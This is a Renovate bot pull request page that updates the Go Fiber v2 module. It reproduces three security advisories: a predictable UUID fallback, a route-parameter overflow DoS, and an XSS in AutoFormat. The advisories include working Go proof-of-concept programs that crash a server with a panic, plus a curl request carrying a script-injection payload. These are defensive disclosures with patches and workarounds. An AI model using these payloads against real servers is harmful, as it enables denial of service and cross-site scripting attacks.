Skip to content

chore: Update module github.com/gofiber/fiber/v2 to v2.52.13 [SECURITY]#149

Open
renovate[bot] wants to merge 1 commit into
masterfrom
renovate/go-github.com-gofiber-fiber-v2-vulnerability
Open

chore: Update module github.com/gofiber/fiber/v2 to v2.52.13 [SECURITY]#149
renovate[bot] wants to merge 1 commit into
masterfrom
renovate/go-github.com-gofiber-fiber-v2-vulnerability

Conversation

@renovate

@renovate renovate Bot commented Feb 9, 2026
edited
Loading

Copy link
Copy Markdown
Contributor

This PR contains the following updates:

Package Change Age Confidence
github.com/gofiber/fiber/v2 v2.52.10v2.52.13 age confidence

Fiber has an insecure fallback in utils.UUIDv4() / utils.UUID() — predictable / zero‑UUID on crypto/rand failure

CVE-2025-66630 / GHSA-68rr-p4fp-j59v

More information

Details

Fiber v2 contains an internal vendored copy of gofiber/utils, and its functions UUIDv4() and UUID() inherit the same critical weakness described in the upstream advisory. On Go versions prior to 1.24, the underlying crypto/rand implementation can return an error if secure randomness cannot be obtained. In such cases, these Fiber v2 UUID functions silently fall back to generating predictable values — the all-zero UUID 00000000-0000-0000-0000-000000000000.

On Go 1.24+, the language guarantees that crypto/rand no longer returns an error (it will block or panic instead), so this vulnerability primarily affects Fiber v2 users running Go 1.23 or earlier, which Fiber v2 officially supports.

Because no error is returned by the Fiber v2 UUID functions, application code may unknowingly rely on predictable, repeated, or low-entropy identifiers in security-critical pathways. This is especially impactful because many Fiber v2 middleware components (session middleware, CSRF, rate limiting, request-ID generation, etc.) default to using utils.UUIDv4().

Impact includes, but is not limited to:

  • Session fixation or hijacking (predictable session IDs)
  • CSRF token forgery or bypass
  • Authentication replay / token prediction
  • Potential denial-of-service (DoS): if the zero UUID is generated, key-based structures (sessions, rate-limits, caches, CSRF stores) may collapse into a single shared key, causing overwrites, lock contention, or state corruption
  • Request-ID collisions, undermining logging and trace integrity
  • General compromise of confidentiality, integrity, and authorization logic relying on UUIDs for uniqueness or secrecy

All Fiber v2 versions containing the internal utils.UUIDv4() / utils.UUID() implementation are affected when running on Go <1.24. No patched Fiber v2 release currently exists.

Suggested Mitigations / Workarounds

Update to the latest version of Fiber v2.

Likelihood / Environmental Factors

It’s important to note that entropy exhaustion on modern Linux systems is extremely rare, as the kernel’s CSPRNG is resilient and non-blocking. However, entropy-source failures — where crypto/rand cannot read from its underlying provider — are significantly more likely in certain environments.

This includes containerized deployments, restricted sandboxes, misconfigured systems lacking read access to /dev/urandom or platform-equivalent sources, chrooted or jailed environments, embedded devices, or systems with non-standard or degraded randomness providers. On Go <1.24, such failures cause crypto/rand to return an error, which the Fiber v2 UUID functions currently treat as a signal to silently generate predictable UUIDs, including the zero UUID. This silent fallback is the root cause of the vulnerability.

References

  • Upstream advisory for gofiber/utils: GHSA-m98w-cqp3-qcqr

  • Source repositories:

    • github.com/gofiber/fiber
    • github.com/gofiber/utils
Credits / Reporter

Reported by @​sixcolors (Fiber Maintainer / Security Team)

Severity

  • CVSS Score: 9.2 / 10 (Critical)
  • Vector String: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Fiber has a Denial of Service Vulnerability via Route Parameter Overflow

CVE-2026-25882 / GHSA-mrq8-rjmw-wpq3

More information

Details

A denial of service vulnerability exists in Fiber v2 and v3 that allows remote attackers to crash the application by sending requests to routes with more than 30 parameters. The vulnerability results from missing validation during route registration combined with an unbounded array write during request matching.

Affected Versions
  • Fiber v3.0.0-rc.3 and earlier v3 releases
  • Fiber v2.52.10 and potentially all v2 releases (confirmed exploitable)
  • Both versions share the same vulnerable routing implementation
Vulnerability Details
Root Cause

Both Fiber v2 and v3 define a fixed-size parameter array in ctx.go:

const maxParams = 30

type DefaultCtx struct {
    values [maxParams]string  // Fixed 30-element array
    // ...
}

The router.go register() function accepts routes without validating parameter count. When a request matches a route exceeding 30 parameters, the code in path.go performs an unbounded write:

  • v3: path.go:514
  • v2: path.go:516
// path.go:514 - NO BOUNDS CHECKING
params[paramsIterator] = path[:i]

When paramsIterator >= 30, this triggers:

panic: runtime error: index out of range [30] with length 30
Attack Scenario

  1. Application registers route with >30 parameters (e.g., via code or dynamic routing):

    app.Get("/api/:p1/:p2/:p3/.../p35", handler)

  2. Attacker sends matching HTTP request:

    curl http://target/api/v1/v2/v3/.../v35

  3. Server crashes during request processing with runtime panic

Proof of Concept
For Fiber v3
package main

import (
	"fmt"
	"net/http"
	"time"
	"github.com/gofiber/fiber/v3"
)

func main() {
	app := fiber.New()
	
	// Register route with 35 parameters (exceeds maxParams=30)
	path := "/test"
	for i := 1; i <= 35; i++ {
		path += fmt.Sprintf("/:p%d", i)
	}
	
	fmt.Printf("Registering route: %s...\n", path[:50]+"...")
	app.Get(path, func(c fiber.Ctx) error {
		return c.SendString("Never reached")
	})
	fmt.Println("✓ Registration succeeded (NO PANIC)")
	
	go func() {
		app.Listen(":9999")
	}()
	time.Sleep(200 * time.Millisecond)
	
	// Build exploit URL with 35 parameter values
	url := "http://localhost:9999/test"
	for i := 1; i <= 35; i++ {
		url += fmt.Sprintf("/v%d", i)
	}
	
	fmt.Println("\n🔴 Sending exploit request...")
	fmt.Println("Expected: panic at path.go:514 params[paramsIterator] = path[:i]\n")
	
	resp, err := http.Get(url)
	if err != nil {
		fmt.Printf("✗ Request failed: %v\n", err)
		fmt.Println("💥 Server crashed!")
	} else {
		fmt.Printf("Response: %d\n", resp.StatusCode)
		resp.Body.Close()
	}
}

Output:

Registering route: /test/:p1/:p2/:p3/:p4/:p5/:p6/:p7/:p8/:p9/:p10...
✓ Registration succeeded (NO PANIC)

🔴 Sending exploit request...
Expected: panic at path.go:514 params[paramsIterator] = path[:i]

panic: runtime error: index out of range [30] with length 30

goroutine 40 [running]:
github.com/gofiber/fiber/v3.(*routeParser).getMatch(...)
	/path/to/fiber/path.go:514
github.com/gofiber/fiber/v3.(*Route).match(...)
	/path/to/fiber/router.go:89
github.com/gofiber/fiber/v3.(*App).next(...)
	/path/to/fiber/router.go:142
For Fiber v2
package main

import (
	"fmt"
	"net/http"
	"time"
	"github.com/gofiber/fiber/v2"
)

func main() {
	app := fiber.New()
	
	// Register route with 35 parameters (exceeds maxParams=30)
	path := "/test"
	for i := 1; i <= 35; i++ {
		path += fmt.Sprintf("/:p%d", i)
	}
	
	fmt.Printf("Registering route: %s...\n", path[:50]+"...")
	app.Get(path, func(c *fiber.Ctx) error {
		return c.SendString("Never reached")
	})
	fmt.Println("✓ Registration succeeded (NO PANIC)")
	
	go func() {
		app.Listen(":9998")
	}()
	time.Sleep(200 * time.Millisecond)
	
	// Build exploit URL with 35 parameter values
	url := "http://localhost:9998/test"
	for i := 1; i <= 35; i++ {
		url += fmt.Sprintf("/v%d", i)
	}
	
	fmt.Println("\n🔴 Sending exploit request...")
	fmt.Println("Expected: panic at path.go:516 params[paramsIterator] = path[:i]\n")
	
	resp, err := http.Get(url)
	if err != nil {
		fmt.Printf("✗ Request failed: %v\n", err)
		fmt.Println("💥 Server crashed!")
	} else {
		fmt.Printf("Response: %d\n", resp.StatusCode)
		resp.Body.Close()
	}
}

Output (v2):

Registering route: /test/:p1/:p2/:p3/:p4/:p5/:p6/:p7/:p8/:p9/:p10...
✓ Registration succeeded (NO PANIC)

🔴 Sending exploit request...
Expected: panic at path.go:516 params[paramsIterator] = path[:i]

panic: runtime error: index out of range [30] with length 30

goroutine 40 [running]:
github.com/gofiber/fiber/v2.(*routeParser).getMatch(...)
	/path/to/fiber/v2@&#8203;v2.52.10/path.go:512
github.com/gofiber/fiber/v2.(*Route).match(...)
	/path/to/fiber/v2@&#8203;v2.52.10/router.go:84
github.com/gofiber/fiber/v2.(*App).next(...)
	/path/to/fiber/v2@&#8203;v2.52.10/router.go:127
Impact
Exploitation Requirements
  • No authentication required
  • Single HTTP request triggers crash
  • Trivially scriptable for sustained DoS
  • Works against any route with >30 parameters
Real-World Impact
  • Public APIs: Remote DoS attacks on vulnerable endpoints
  • Microservices: Cascade failures if vulnerable service is critical
  • Auto-scaling: Repeated crashes prevent proper recovery
  • Monitoring: Log flooding and alert fatigue
Likelihood

HIGH - Exploitation requires only:

  • Knowledge of route structure (often public in APIs)
  • Standard HTTP client (curl, browser, etc.)
  • Single malformed request
Workarounds

Until patched, users should:

  1. Audit Routes: Ensure all routes have ≤30 parameters

    # Search for potential issues
grep -r "/:.*/:.*/:.*" . | grep -v node_modules

  2. Disable Dynamic Routing: If programmatically registering routes, validate parameter count:

    paramCount := strings.Count(route, ":")
if paramCount > 30 {
    log.Fatal("Route exceeds maxParams")
}

  3. Rate Limiting: Deploy aggressive rate limiting to mitigate DoS impact

  4. Monitoring: Alert on panic patterns in application logs

Timeline
  • 2024-12-24: Vulnerability discovered in v3 during PR #​3962 review
  • 2024-12-25: Proof of concept confirmed exploitability in v3
  • 2024-12-25: Vulnerability confirmed to also exist in v2 (same root cause)
  • 2024-12-25: Security advisory created
References
Credit

Discovered by: @​sixcolors (Fiber maintainer) and @​TheAspectDev

Severity

  • CVSS Score: 6.9 / 10 (Medium)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Fiber vulnerable to XSS in AutoFormat Content Negotiation

CVE-2026-42554 / GHSA-qjv7-627w-8qjv

More information

Details

Summary

Description

A Cross-Site Scripting (CWE-79) vulnerability in Go Fiber allows a remote attacker to inject arbitrary HTML/JavaScript by supplying Accept: text/html on any request whose handler passes attacker-influenced data to the AutoFormat() feature. This affects github.com/gofiber/fiber/v3 (DefaultRes.AutoFormat) through version 3.1.0 and github.com/gofiber/fiber/v2 (Ctx.Format) through version 2.52.12.

The developer opts into content negotiation by calling AutoFormat(), but does not opt into raw HTML emission for a particular request; Fiber chooses that branch from attacker-controlled Accept. Five of the six branches of the same method already escape. JSON, XML, MsgPack, and CBOR all route through encoders that neutralize markup; the txt branch emits text/plain and cannot execute. The html branch is the sole outlier in a method whose name (AutoFormat) and symmetrical structure actively telegraph "safe, format-agnostic reply."

Details

The issue resides in res.go within (*DefaultRes).AutoFormat(). The method negotiates against the request Accept header, selects one of html | json | txt | xml | msgpack | cbor, and serializes the caller-supplied body accordingly.

The "html" branch concatenates the stringified body directly into HTML markup with no output encoding:

  • accept comes from r.c.Accepts(...), i.e. is fully attacker-controlled. An attacker can force the "html" branch on any AutoFormat() call regardless of which format the developer tested against.
  • b is produced from body via direct assignment (string / []byte) or fmt.Sprintf("%v", body). No html.EscapeString is applied.
  • The resulting string is sent as text/html; charset=utf-8, so browsers render it as active HTML.
// res.go
func (r *DefaultRes) AutoFormat(body any) error {

    accept := r.c.DefaultReq.Accepts("html", "json", "txt", "xml", "msgpack", "cbor")

    r.Type(accept)
    var b string
    switch val := body.(type) {
    case string:
        b = val
    case []byte:
        b = r.c.app.toString(val)
    default:
        b = fmt.Sprintf("%v", val)
    }

    switch accept {
    case "txt":
        return r.SendString(b)
    case "json":
        return r.JSON(body)
    case "xml":
        return r.XML(body)
    case "html":
        return r.SendString("<p>" + b + "</p>")
    case "msgpack":
        return r.MsgPack(body)
    case "cbor":
        return r.CBOR(body)
    }
    return r.SendString(b)
}
Impact

This impacts all current v3 releases ≤ 3.1.0 containing DefaultRes.AutoFormat, and all current v2 releases ≤ 2.52.12 where the identical "<p>" + b + "</p>" construction exists in (*Ctx).Format(). Exploitation requires that an application call c.AutoFormat(v) where v (or a field stringified by %v) contains request-influenced data.

A handler that uses AutoFormat() to serve multiple representations of the same data can be turned into an HTML XSS sink when the client sends Accept: text/html, even if the developer only tested the JSON path.

This may result in:

  • Reflected XSS in the application's origin via any request-derived value reaching AutoFormat.
  • Stored XSS where the reflected value originates from persisted input later passed to AutoFormat.
Proposed Patch

The injection surface is r.Type("html") followed by r.SendString(b) with unescaped caller data, where it constructs markup on the caller's behalf around a value whose HTML-ness the caller did not declare. A few options:

  • AutoFormat() should treat body as data, not markup, in the "html" branch and escape it before concatenating it into the framework-generated <p> wrapper. Callers that need raw negotiated HTML should use Format() with an explicit HTML handler.
  • Introduce a sibling method that escapes, leave AutoFormat alone for backward compatibility.

HTML-escape the value in the "html" branch before concatenating it into the <p> wrapper.

import "html"

// ...
case "html":
    return r.SendString("<p>" + html.EscapeString(b) + "</p>")

html.EscapeString escapes <, >, &, ', ", which is sufficient for an element-text context. Apply the same change to v2's (*Ctx).Format().

Proof of Concept
##### Create project directory
mkdir fiber-xss-poc && cd fiber-xss-poc

##### Initialize Go module
go mod init fiber-xss-poc

##### Install Fiber v3
go get github.com/gofiber/fiber/v3

##### Create the PoC file
cat > main.go << 'EOF'
package main

import (
	"github.com/gofiber/fiber/v3"
)

type User struct {
	ID   int    `json:"id"`
	Name string `json:"name"`
}

func main() {
	app := fiber.New()
	
	app.Get("/api/user", func(c fiber.Ctx) error {
		user := User{
			ID:   1,
			Name: c.Query("name", "anonymous"),
		}
		return c.AutoFormat(user)
	})

	app.Listen(":3000")
}
EOF

##### Run it
go run main.go
}

Benign JSON

curl -s 'http://127.0.0.1:3000/api/user?name=Alice' -H 'Accept: application/json'
{"id":1,"name":"Alice"}

HTML sink enables XSS

curl -s 'http://127.0.0.1:3000/api/user?name=<script>alert(document.domain)</script>' -H 'Accept: text/html'
<p>{1 <script>alert(document.domain)</script>}</p>

Severity

  • CVSS Score: 5.3 / 10 (Medium)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Release Notes

gofiber/fiber (github.com/gofiber/fiber/v2)

v2.52.13

Compare Source

What's Changed

🐛 Bug Fixes

Full Changelog: gofiber/fiber@v2.52.12...v2.52.13

v2.52.12

Compare Source

🐛 Fixes

Full Changelog: gofiber/fiber@v2.52.11...v2.52.12

v2.52.11

Compare Source

What's Changed

🧹 Updates
🐛 Bug Fixes

Full Changelog: gofiber/fiber@v2.52.10...v2.52.11

Configuration

📅 Schedule: (in timezone Asia/Singapore)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Enabled.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate Bot added the renovate label Feb 9, 2026
@renovate renovate Bot force-pushed the renovate/go-github.com-gofiber-fiber-v2-vulnerability branch from 709d331 to 1b6b0eb Compare February 25, 2026 01:07
@renovate renovate Bot changed the title chore: Update module github.com/gofiber/fiber/v2 to v2.52.11 [SECURITY] chore: Update module github.com/gofiber/fiber/v2 to v2.52.12 [SECURITY] Feb 25, 2026
@renovate renovate Bot changed the title chore: Update module github.com/gofiber/fiber/v2 to v2.52.12 [SECURITY] chore: Update module github.com/gofiber/fiber/v2 to v2.52.12 [SECURITY] - autoclosed Mar 27, 2026
@renovate renovate Bot closed this Mar 27, 2026
@renovate renovate Bot deleted the renovate/go-github.com-gofiber-fiber-v2-vulnerability branch March 27, 2026 00:56
@renovate renovate Bot changed the title chore: Update module github.com/gofiber/fiber/v2 to v2.52.12 [SECURITY] - autoclosed chore: Update module github.com/gofiber/fiber/v2 to v2.52.12 [SECURITY] Mar 30, 2026
@renovate renovate Bot reopened this Mar 30, 2026
@renovate renovate Bot force-pushed the renovate/go-github.com-gofiber-fiber-v2-vulnerability branch 2 times, most recently from 1b6b0eb to c3a4dd8 Compare March 30, 2026 17:40
@renovate renovate Bot changed the title chore: Update module github.com/gofiber/fiber/v2 to v2.52.12 [SECURITY] chore: Update module github.com/gofiber/fiber/v2 to v2.52.12 [SECURITY] - autoclosed Apr 27, 2026
@renovate renovate Bot closed this Apr 27, 2026
@renovate renovate Bot changed the title chore: Update module github.com/gofiber/fiber/v2 to v2.52.12 [SECURITY] - autoclosed chore: Update module github.com/gofiber/fiber/v2 to v2.52.12 [SECURITY] Apr 27, 2026
@renovate renovate Bot reopened this Apr 27, 2026
@renovate renovate Bot force-pushed the renovate/go-github.com-gofiber-fiber-v2-vulnerability branch from c3a4dd8 to efd8096 Compare April 27, 2026 22:58
@renovate renovate Bot force-pushed the renovate/go-github.com-gofiber-fiber-v2-vulnerability branch from efd8096 to 5d846b9 Compare May 6, 2026 17:35
@renovate renovate Bot changed the title chore: Update module github.com/gofiber/fiber/v2 to v2.52.12 [SECURITY] chore: Update module github.com/gofiber/fiber/v2 to v2.52.13 [SECURITY] May 6, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

renovate

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

0 participants